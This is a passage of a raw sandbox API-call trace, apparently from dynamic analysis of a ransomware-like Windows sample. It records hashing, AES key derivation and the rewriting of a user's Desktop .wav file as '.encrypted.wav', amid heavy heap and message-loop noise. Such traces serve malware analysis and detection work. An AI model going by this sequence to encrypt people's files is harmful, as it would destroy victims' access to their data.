hHeap=0x770000) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.020] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.020] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.020] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.020] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.020] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.021] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0030.021] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.021] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.021] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.021] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.021] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.021] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.021] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.021] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.021] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.022] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0030.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.022] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0030.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.022] CryptDestroyHash (hHash=0x7c2100) returned 1 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.022] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.022] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0030.022] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.022] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.023] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kyfcsy7fw675g46j6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0030.023] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.023] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.023] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.023] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.023] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\kYfCsY7fw675g46j6.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kyfcsy7fw675g46j6.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0030.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0030.024] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0030.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.024] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0030.024] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xeb65, lpOverlapped=0x0) returned 1 [0030.026] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0030.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xeb65) returned 0x8affc0 [0030.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.027] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0030.027] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.027] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0030.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.028] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.028] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0030.028] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.028] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0030.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.029] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0030.029] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.029] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.029] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.029] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.029] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0030.030] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.030] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9a8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0030.030] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0030.030] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0030.030] 